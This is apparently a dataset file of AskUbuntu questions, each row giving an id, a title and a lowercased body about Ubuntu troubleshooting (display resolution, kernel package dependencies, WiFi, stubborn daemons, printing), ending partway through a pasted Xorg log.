439885	ubuntu 12.04 lts monitor with lower resolution	i have monitor with possible resolution 1920x1080 ( on windows ) and i have installed ubuntu 12.04 lts . the posssible resolution there:1440x900 . how to change resolution to proper one ? i installed drivers : nvidia ( resolution changed from 1024x800 to 1440x900 ) i tried xrandr option .
439888	how to resolve dependency problems with differing versions between linux-server and linux-image-server	i 'm new to linux system . recently i have noticed my /boot is 100 % full and i could n't update my system . i google for solution for free my /boot space . i found the document how do i free up more space in /boot ? and an apt-get autoremove command to remove linux kernel unnecessary from /boot . now i get following error dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.59.70 ) ; however : version of linux-image-server on system is 3.2.0.60.71 . please anyone have any idea regarding this error . i have found one document on linux-image-generic update manager crashes , says it needs 3.2.0.58.69 but linux-image-generic on system is 3.2.0.59.70 . but i think both are different . any idea how to solve it ? ?
439889	ubuntu unity corrupted , glitching after fresh install	i am doing a fresh install of ubuntu on asus f3u , however after the initial startup and downloading updates i am unable to fix the display which is clearly glitched . i have made 2 screenshots covering the issue . unity -- reset does n't help . lspci shows me that i have integrated ati radeon xpress11xx card , which seems correct , however the gpu is not listed in the system as if the driver was missing . furthermore , additional drivers menu does n't list gpu driver as downloadable or installable . i have tried downloading the proper package from amd site , but the run file i used was flooding the console with some ascii characters . i did n't treat it as normal behaviour and thus terminated the script . should i leave it and let it finish whatever it was doing ? i can post any type of output you require , however i am still a newbie when it comes to advanced setup in unix , please forgive if i missed something obvious . i can not add the screenshots at the moment , i 'll update the post asap . as for the description of the issue , the system seem not to be able to keep the borders of the screen drawing , frequently leaving some leftovers and corrupting the whole screen so that it is virtually unreadable . thanks in advance alex
439892	wierd window look for system apps	i installed some special programs a time ago and added several extra repositories . after trying those apps , i uninstalled them and the according repos . for a several amount of time , i have wierd looking system windows ( system settings e.g. ) . how can i restore the default system apps ? udate : this is not related to the selected theme . those themes worked well before , i think , the whole system settings app changed , but i 'm not quite sure . if you can compare your for e.g . audio settings tool with mine , you will see a difference .
439896	how can the x root window be seen instead of the unity desktop ?	i would like to be able to see the x root window instead of the unity desktop . this could be for the purposes of using such programs as xphoon , which fill the x root window with graphics . how can unity be set such that the x root window becomes visible instead of the desktop wallpaper ?
439902	touchpad/backlight keys on asus transformer t300la	i have asus transformer book t300 . almost all my hardware working perfectly on ubuntu 13.10/14.04 beta but my touchpad defined as mouse and gestures not working : ( i need this option . touchpad connected via radio relations with hidden in case usb receiver ( not via standart ps/2 ) . how i can make it works ? backlight keys not working too . http : //ubuntuforums.org/showthread.php ? t=2198934 thread with logs in forum : (
439909	thunderbird endlessly redownloading messages with davmail	i am using thunderbird + davmail in order to access my ms exchange account . i have always been experiencing the problem described here and it is really painful . before davmail i was using exquilla , which worked like a charm . i switched to davmail because exquilla is not free . if you faced the same problem -- that is , thunderbird endlessly redownloading messages -- do you have a workaround ?
439914	how to stop dhcpd ?	i am trying to stop the dhcpd , but whenever i stop it , it restart again immediately . $ ps aux | grep dhcp dhcpd 7116 0.0 0.1 19672 6604 ? ss 16:33 0:00 dhcpd -user dhcpd -group dhcpd -f -q -4 -pf /run/dhcp-server/dhcpd.pid -cf /etc/dhcp/dhcpd.conf wlan0 i tried /etc/init.d/dhcpd stop but with no luck bash : /etc/init.d/dhcpd : no such file or directory also service dhcpd stop gives me this dhcpd : unrecognized service
439915	wifi problem caused by dual boot of ubuntu 12.04 x64 and windows 7 x64 under one hdd	when i installed ubuntu 12.04 x64 successfully , the wi-fi was initially working . however , i can not boot windows 7 x64 . so i installed and run the boot-repair under ubuntu which fixed grub2 . and so i can finally boot to my windows 7 . but the problem is that the ubuntu showed a warning message that went something like the ubuntu os is too far from the beginning of the hdd . ( by the way , i currently have three ( 3 ) main partitions , windows 7 , ubuntu and data partition . ) upon starting the ubuntu , the wi-fi is not working . i needed to suspend and wake the laptop up just to get the wi-fi working . for the windows os , hibernation can not be completed . i read that it needs the windows 7 to be the first disk to boot . i guess the solution would be rearranging the partition in their correct order . here is the information about my hdd , what should be the correct order of my partitions and how do you rearrange them ? or other solutions ?
439917	upgrade ubuntu from 12.04 to 13.10	how will i upgrade ubuntu 12.04 to 13.1 internally without the iso file . please help .
439918	unable to print . /usr/lib/cups/filter/gstoraster failed problem	i have a network printer ( model : hp-laserjet-p2055dn ) today i have been experiencing problems on printing ( never had them before ) . the printing process is stopped and the only error i get is : /usr/lib/cups/filter/gstoraster failed i tried to reinstall hplip , reinstall the printer , but with no results . thanks
439919	how to upgrade bluefish version ?	i have ubuntu 11.04 natty os . i have bluefish 2.0.2 version , i want to upgrade this version to bluefish 2.2.5 on same os . i do n't want to change or upgrade my os ( ubuntu 11.04 ) . if any one has perfect solution , then please do reply asap .
439923	gwibber alternative for facebook on 12.04	i have browsed similar questions only to find people mainly asking for twitter alternatives . i would like to have something like gwibber ( which never worked for me till date ) for using my facebook on ubuntu 12.04 . i have both fb and twitter ( i have multiple accounts ) open in different browsers which i want to avoid using . my primary requirement is support for at least one account of facebook . thanks .
439926	rename default `` ubuntu one '' folder on 12.04 server possible ?	i 'm running ubuntu 12.04 server from home and using ubuntu one as backup site . i 'm not great at scripts ( beginner ) so when writing bash scripts that i later crontab for backups , having to use `` ubuntu\ one '' or similar methods messes things up . in fact , i had to do in my script `` cd 'ubuntu\ one ' '' in the script so i could skip using the directory structure in the tar command , cause it would n't work . any chance to rename the default `` ubuntu one '' folder ? or is there some other easy way i 'm just not seeing while handling tar commands ? the following was what i was trying to do , does not work : dest_dir= '' /home/user/ubuntu\ one/backup '' tar -vczpf $ { dest_dir } / $ { fname } - $ { timestamp } .tar.gz $ { src_dir } > > $ { log } this does work however : cd /home/user/ubuntu\ one tar -vczpf $ { fname } - $ { timestamp } .tar.gz $ { src_dir } > > $ { log } i wanted variables so i could backup more specific files and directories and use array later to sort out where stuff goes . forcing me to `` cd '' to the u1 directory in the script kinda sucks .
439928	ca n't install linux-firmware . eternal download looping	i 'm having problems with the linux-firmware instalation . when i try to update my ubuntu 13.10 64 bit it starts a eternal download loop here : os pacotes a seguir serão atualizados : linux-firmware 1 pacotes atualizados , 0 pacotes novos instalados , 0 a serem removidos e 231 não atualizados . é preciso baixar 26,5 mb de arquivos . depois desta operação , 1.337 kb adicionais de espaço em disco serão usados . obter:1 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:2 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:3 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:4 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:5 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:6 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:7 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:8 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:9 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:10 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:11 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:12 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:13 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:14 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:15 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:16 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:17 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:18 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:19 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:20 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:21 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:22 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:23 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] obter:24 http : //br.archive.ubuntu.com/ubuntu/ saucy-updates/main linux-firmware all 1.116.2 [ 26,5 mb ] i have no idea what is happening . and my eclipse does n't work too . i 've just installed ubuntu 13.10 yesterday . i 'm using a acer intel® core™ i5-2450m cpu @ 2.50ghz × 4 , grafics : intel® sandybridge mobile , a 64 bit platform . i really would like to know how to solve this problem . thanks .
439933	steadyflow download manager	i am using ubuntu 13.10 and i 'm new in linux world . i try to download steadyflow download manager , but i want like internet download manager : when i click it should automatically download it . notice : i am using firefox as web browser . thanks
439934	what is the difference between a deb package and a binary package ?	i am not sure if it 's true to say when you download a package from ubuntu repository , then that it will be a debian package and if you download only a tar file and use make command to install it , than that it will be a binary package ? i mean if we use : sudo apt-get install something then something is a debian package ? is it true ?
439937	what exactly happend to the fbb-font in latex when using the ubuntu ( 13.10 ) installer	i installed texlive-full from a repository instead of using the installer provided here . i noticed that the fbb font is missing , which seems to be specific to the ubuntu packages ? ! i have n't found much on this on the web , including a way of properly obtaining/installing the font ( i guess this is since the rest of the internet does n't have this problem using when the official installer ) . so what happened to that font ? besides using the official installer on my system , is there any other way to obtain the font ? if i would copy the font from another installation i did on another system using the official installer ( e.g . copying all files named `` fbb* '' in the installation dir and updating the font system with updmaps ) ... would that work ? my specs : ubuntu 13.10 3.11.0-18-generic x86_64 texlive-full 2013.20130722-1
439943	wifi not working on ubuntu running directly through usb	is it possible to use wifi on ubuntu running directly through usb or is it that my ubuntu is corrupted and not allowing me to use wifi because i see no connection in the wifi when i click on try ubuntu in the setup . what should i do ?
439946	i am unable to connect to wifi network , using a 'dell inspiron 3521 ' with ubuntu 12.04	i am unable to connect to wifi network in my dell inspiron 3521 with ubuntu 12.04 , even though my internet cable connection ( lan ) is working just fine . i have installed 'broadcom sta ' and its required softwares , but i am not able to connect to wifi network . also there are no results when i run following command , so i am unable to identify the chipset : lspci -vvnn | grep 14e4 can you help me identify the chipset and also resolve the wifi problem ?
439950	how do i stop transmission-daemon ?	how do i stop transmission-daemon ? i 've ran sudo /etc/init.d/transmission-daemon stop and after a while i get confirmation that it completed [ ok ] : greg @ vmanage : ~ $ sudo /etc/init.d/transmission-daemon stop * stopping bittorrent daemon transmission-daemon [ ok ] but if i immediately run ps aux | grep transm i see that transmission-daemon is still running . greg @ vmanage : ~ $ ps aux | grep trans 122 5047 0.2 0.0 246264 3604 ? ssl 15:12 0:00 /usr/bin/transmission-daemon -f -- config-dir /var/ lib/transmission-daemon/info greg 5079 0.0 0.0 13648 944 pts/1 s+ 15:12 0:00 grep -- color=auto trans ** updated ** i 've also tried killing the process but this has no effect : greg @ vmanage : ~ $ ps aux | grep trans 122 5047 0.0 0.0 250400 3744 ? ssl 15:12 0:00 /usr/bin/transm ission-daemon -f -- config-dir /var/lib/transmission-daemon/info greg 14706 0.0 0.0 13648 944 pts/2 s+ 15:49 0:00 grep -- color=au to trans greg @ vmanage : ~ $ sudo kill -9 5047 [ sudo ] password for greg : greg @ vmanage : ~ $ ps aux | grep trans 122 14795 0.1 0.0 246264 3600 ? ssl 15:49 0:00 /usr/bin/transmission-daemon -f -- config-dir /var/lib/transmission-daemon/info greg 14847 0.0 0.0 13648 948 pts/2 s+ 15:49 0:00 grep -- color=auto trans greg @ vmanage : ~ $ sudo kill -9 14795 greg @ vmanage : ~ $ ps aux | grep trans 122 14896 0.5 0.0 246264 3552 ? ssl 15:50 0:00 /usr/bin/transmission-daemon -f -- config-dir /var/lib/transmission-daemon/info greg 14912 0.0 0.0 13648 948 pts/2 s+ 15:50 0:00 grep -- color=auto trans it looks like the process is being killed but it 's being restarted , not the new pid in the 2nd and 3rd calls to ps aux .
439951	error during update	i 'm trying to update my computer using sudo apt-get update but i 'm getting the following error : err unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com precise-security/universe translation-en unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.91.14 80 ] fetched 15.7 kb in 12min 15s ( 21 b/s ) w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.91.14 80 ] e : some index files failed to download . they have been ignored , or old ones used instead
439955	x crashes on boot with dual external monitors - lenovo y580	i have a lenovo y580 with an optimus geforce 660m , and i 'm using bumblebee as my graphics driver . i want to disable the screen on the laptop and use two external monitors instead - one hooked up through the vga port , the other through hdmi . if i turn the computer on with only one of the external monitors plugged in , everything is fine . the machine boots as normal and uses the laptop screen and the one external as dual displays . if i connect both external monitors and boot , x crashes and i get a `` running in low graphics mode '' error which i ca n't get past . but interestingly , if i connect one of the monitors , boot , and then connect the second monitor after it boots to the desktop , everything is fine and i can use my two externals with the laptop screen disabled ( which is what i want ) . i have a funny feeling this is from optimus using the intel chip at boot , which probably ca n't support dual external monitors , but i 'm not sure how to fix it . here 's the xorg log : [ 3.499 ] x.org x server 1.13.0 release date : 2012-09-05 [ 3.499 ] x protocol version 11 , revision 0 [ 3.499 ] build operating system : linux 2.6.42-37-generic x86_64 ubuntu [ 3.499 ] current operating system : linux ubuntu 3.5.0-47-generic # 71~precise1-ubuntu smp wed feb 19 22:02:52 utc 2014 x86_64 [ 3.499 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-47-generic root=uuid=3e44a12944a0e4bd loop=/ubuntu/disks/root.disk ro quiet splash vt.handoff=7 [ 3.499 ] build date : 16 october 2013 04:43:36pm [ 3.499 ] xorg-server 2:1.13.0-0ubuntu6.1~precise4 ( for technical support please see http : //www.ubuntu.com/support ) [ 3.499 ] current version of pixman : 0.24.4 [ 3.499 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 3.499 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 3.499 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu mar 27 12:28:48 2014 [ 3.501 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 3.502 ] ( == ) no layout section . using the first screen section . [ 3.502 ] ( == ) no screen section available . using defaults . [ 3.502 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 3.502 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 3.502 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 3.502 ] ( == ) automatically adding devices [ 3.502 ] ( == ) automatically enabling devices [ 3.502 ] ( == ) automatically adding gpu devices [ 3.503 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 3.503 ] entry deleted from font path . [ 3.503 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 3.503 ] entry deleted from font path . [ 3.503 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 3.503 ] entry deleted from font path . [ 3.505 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 3.505 ] entry deleted from font path . [ 3.505 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 3.505 ] entry deleted from font path . [ 3.505 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 3.505 ] entry deleted from font path . [ 3.505 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 3.505 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 3.505 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 3.505 ] ( ii ) loader magic : 0x7fb6c80b5c20 [ 3.505 ] ( ii ) module abi versions : [ 3.505 ] x.org ansi c emulation : 0.4 [ 3.505 ] x.org video driver : 13.0 [ 3.505 ] x.org xinput driver : 18.0 [ 3.505 ] x.org server extension : 7.0 [ 3.505 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 3.853 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0166:17aa:3977 rev 9 , mem @ 0xd3000000/4194304 , 0xe0000000/268435456 , i/o @ 0x00004000/64 [ 3.853 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0fd4:17aa:3977 rev 161 , mem @ 0xd2000000/16777216 , 0xc0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00003000/128 [ 3.853 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 3.853 ] initializing built-in extension generic event extension [ 3.853 ] initializing built-in extension shape [ 3.853 ] initializing built-in extension mit-shm [ 3.853 ] initializing built-in extension xinputextension [ 3.853 ] initializing built-in extension xtest [ 3.853 ] initializing built-in extension big-requests [ 3.853 ] initializing built-in extension sync [ 3.853 ] initializing built-in extension xkeyboard [ 3.853 ] initializing built-in extension xc-misc [ 3.853 ] initializing built-in extension security [ 3.853 ] initializing built-in extension xinerama [ 3.853 ] initializing built-in extension xfixes [ 3.853 ] initializing built-in extension render [ 3.853 ] initializing built-in extension randr [ 3.853 ] initializing built-in extension composite [ 3.853 ] initializing built-in extension damage [ 3.853 ] initializing built-in extension mit-screen-saver [ 3.853 ] initializing built-in extension double-buffer [ 3.853 ] initializing built-in extension record [ 3.853 ] initializing built-in extension dpms [ 3.853 ] initializing built-in extension x-resource [ 3.853 ] initializing built-in extension xvideo [ 3.853 ] initializing built-in extension xvideo-motioncompensation [ 3.853 ] initializing built-in extension xfree86-vidmodeextension [ 3.853 ] initializing built-in extension xfree86-dga [ 3.853 ] initializing built-in extension xfree86-dri [ 3.853 ] initializing built-in extension dri2 [ 3.853 ] ( ii ) loadmodule : `` glx '' [ 3.857 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 3.864 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 3.864 ] compiled for 1.13.0 , module version = 1.0.0 [ 3.864 ] abi class : x.org server extension , version 7.0 [ 3.864 ] ( == ) aiglx enabled [ 3.864 ] loading extension glx [ 3.864 ] ( == ) matched intel as autoconfigured driver 0 [ 3.864 ] ( == ) matched intel as autoconfigured driver 1 [ 3.864 ] ( == ) matched vesa as autoconfigured driver 2 [ 3.864 ] ( == ) matched modesetting as autoconfigured driver 3 [ 3.864 ] ( == ) matched fbdev as autoconfigured driver 4 [ 3.864 ] ( == ) assigned the driver to the xf86configlayout [ 3.864 ] ( ii ) loadmodule : `` intel '' [ 3.864 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 3.874 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 3.874 ] compiled for 1.13.0 , module version = 2.20.9 [ 3.874 ] module class : x.org video driver [ 3.874 ] abi class : x.org video driver , version 13.0 [ 3.874 ] ( ii ) loadmodule : `` vesa '' [ 3.874 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 3.875 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 3.875 ] compiled for 1.13.0 , module version = 2.3.2 [ 3.875 ] module class : x.org video driver [ 3.875 ] abi class : x.org video driver , version 13.0 [ 3.875 ] ( ii ) loadmodule : `` modesetting '' [ 3.875 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 3.877 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 3.877 ] compiled for 1.13.0 , module version = 0.5.0 [ 3.877 ] module class : x.org video driver [ 3.877 ] abi class : x.org video driver , version 13.0 [ 3.877 ] ( ii ) loadmodule : `` fbdev '' [ 3.877 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 3.877 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 3.877 ] compiled for 1.13.0 , module version = 0.4.3 [ 3.877 ] module class : x.org video driver [ 3.877 ] abi class : x.org video driver , version 13.0 [ 3.877 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , hd graphics , hd graphics 4600 , haswell desktop ( gt3 ) , hd graphics , hd graphics 4600 , haswell mobile ( gt3 ) , hd graphics , hd graphics p4600/p4700 , haswell server ( gt3 ) , haswell ( gt1 ) , haswell ( gt2 ) , haswell ( gt3 ) , hd graphics , haswell ( gt2 ) , haswell ( gt3 ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt3 ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt3 ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4400 , hd graphics 5000 , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , iris ( tm ) graphics 5100 , haswell ult ( gt1 ) , haswell ult ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4200 , iris ( tm ) graphics 5100 , haswell crw desktop ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw mobile ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , valleyview po board [ 3.877 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 3.877 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 3.878 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 3.878 ] ( ++ ) using vt number 7 [ 3.878 ] ( ii ) intel ( 0 ) : using device path '/dev/dri/card0' [ 3.878 ] ( ww ) falling back to old probe method for vesa [ 3.878 ] ( ww ) falling back to old probe method for modesetting [ 3.878 ] ( ww ) falling back to old probe method for fbdev [ 3.878 ] ( ii ) loading sub module `` fbdevhw '' [ 3.878 ] ( ii ) loadmodule : `` fbdevhw '' [ 3.878 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 3.878 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 3.878 ] compiled for 1.13.0 , module version = 0.0.2 [ 3.878 ] abi class : x.org video driver , version 13.0 [ 3.878 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 3.878 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 3.878 ] ( == ) intel ( 0 ) : rgb weight 888 [ 3.878 ] ( == ) intel ( 0 ) : default visual is truecolor [ 3.878 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) ivybridge mobile ( gt2 ) [ 3.878 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 3.878 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 3.878 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 3.878 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 3.878 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 3.878 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 3.878 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled [ 3.878 ] ( == ) intel ( 0 ) : video overlay key set to 0x101fe [ 3.878 ] ( ii ) intel ( 0 ) : output lvds1 has no monitor section [ 3.878 ] ( -- ) intel ( 0 ) : found backlight control interface /sys/class/backlight/acpi_video1 [ 4.028 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 4.167 ] ( ii ) intel ( 0 ) : output hdmi1 has no monitor section [ 4.216 ] ( ii ) intel ( 0 ) : output dp1 has no monitor section [ 4.216 ] ( ii ) intel ( 0 ) : edid for output lvds1 [ 4.216 ] ( ii ) intel ( 0 ) : manufacturer : lgd model : 1e9 serial # : 0 [ 4.216 ] ( ii ) intel ( 0 ) : year : 2009 week : 0 [ 4.216 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 4.216 ] ( ii ) intel ( 0 ) : digital display input [ 4.216 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 35 vert . : 19 [ 4.216 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 4.216 ] ( ii ) intel ( 0 ) : no dpms capabilities specified [ 4.216 ] ( ii ) intel ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 4.216 ] ( ii ) intel ( 0 ) : first detailed timing is preferred mode [ 4.216 ] ( ii ) intel ( 0 ) : redx : 0.621 redy : 0.352 greenx : 0.314 greeny : 0.586 [ 4.216 ] ( ii ) intel ( 0 ) : bluex : 0.147 bluey : 0.118 whitex : 0.313 whitey : 0.329 [ 4.216 ] ( ii ) intel ( 0 ) : manufacturer 's mask : 0 [ 4.216 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.216 ] ( ii ) intel ( 0 ) : clock : 138.5 mhz image size : 345 x 194 mm [ 4.216 ] ( ii ) intel ( 0 ) : h_active : 1920 h_sync : 1968 h_sync_end 2000 h_blank_end 2080 h_border : 0 [ 4.216 ] ( ii ) intel ( 0 ) : v_active : 1080 v_sync : 1083 v_sync_end 1088 v_blanking : 1111 v_border : 0 [ 4.216 ] ( ii ) intel ( 0 ) : lg display [ 4.216 ] ( ii ) intel ( 0 ) : lp156wf1-tlc1 [ 4.216 ] ( ii ) intel ( 0 ) : edid ( in hex ) : [ 4.216 ] ( ii ) intel ( 0 ) : 00ffffffffffff0030e4e90100000000 [ 4.216 ] ( ii ) intel ( 0 ) : 00130103802313780a08d59f5a509625 [ 4.216 ] ( ii ) intel ( 0 ) : 1e505400000001010101010101010101 [ 4.216 ] ( ii ) intel ( 0 ) : 0101010101011a3680a070381f403020 [ 4.216 ] ( ii ) intel ( 0 ) : 350059c2100000190000000000000000 [ 4.216 ] ( ii ) intel ( 0 ) : 00000000000000000000000000fe004c [ 4.216 ] ( ii ) intel ( 0 ) : 4720446973706c61790a2020000000fe [ 4.216 ] ( ii ) intel ( 0 ) : 004c503135365746312d544c433100b0 [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 320x240 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 512x384 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 640x480 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 640x512 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 800x600 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 896x672 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 928x696 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 960x720 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 576x432 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 700x525 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 720x450 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 800x512 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel 